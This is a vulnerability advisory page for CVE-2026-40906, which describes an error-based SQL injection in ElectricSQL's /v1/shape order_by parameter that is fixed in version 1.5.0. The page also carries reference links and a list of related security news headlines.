Critical severity9.9NVD Advisory· Published Apr 21, 2026· Updated May 13, 2026
CVE-2026-40906
CVE-2026-40906
Description
Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted ORDER BY expressions. This vulnerability is fixed in 1.5.0.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
2- github.com/electric-sql/electric/pull/4081nvdExploitIssue Tracking
- github.com/electric-sql/electric/security/advisories/GHSA-h5rg-pxx7-r2hjnvdExploitVendor Advisory
News mentions
12- ICS Patch Tuesday: New Security Advisories From Siemens, Schneider, CISASecurityWeek · May 13, 2026
- Dirty Frag (CVE-2026-43284, CVE-2026-43500): Frequently asked questions about this Linux kernel privilege escalation vulnerability chainTenable Blog · May 8, 2026
- 'Dirty Frag' Linux flaw one-ups CopyFail with no patches and public root exploitThe Register Security · May 8, 2026
- Claude AI Guided Hackers Toward OT Assets During Water Utility IntrusionSecurityWeek · May 7, 2026
- From Stuxnet to ChatGPT: 20 News Events That Shaped CyberDark Reading · May 6, 2026
- Claude Mythos Fears Startle Japan's Financial Services SectorDark Reading · Apr 30, 2026
- Shutdowns, power outages, and conflict: a review of Q1 2026 Internet disruptionsCloudflare Blog · Apr 28, 2026
- Electricity Is a Growing Area of Cyber-RiskDark Reading · Apr 22, 2026
- Signed Adware Operation Disables Antivirus Across 23,000 HostsInfosecurity Magazine · Apr 15, 2026
- ZDI-26-212: Schneider Electric EcoStruxure Data Center Expert Hard-coded Password Remote Code Execution VulnerabilityZero Day Initiative · Mar 16, 2026
- Fuji Electric TellusCISA Alerts
- Yadea T5 Electric BicycleCISA Alerts